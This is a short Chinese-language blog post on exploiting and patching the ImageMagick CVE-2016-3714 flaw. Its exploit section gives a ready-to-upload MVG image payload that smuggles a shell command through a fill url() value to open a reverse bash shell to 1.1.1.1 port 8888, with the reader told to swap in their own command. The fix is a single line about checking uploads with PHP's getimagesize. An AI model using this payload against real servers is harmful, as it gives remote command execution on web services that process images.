ImageMagick漏洞(cve-2016-3714)利用及修復

利用:

如下內容保存爲圖片格式上傳即可(命令部分自行替換)

push graphic-context
viewbox 0 0 640 480
fill 'url(https://example.com/image.jpg"|bash -i >& /dev/tcp/1.1.1.1/8888 0>&1")'
pop graphic-context

修復(php):

上傳時先利用getimagesize函數檢查是否爲正常圖片

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章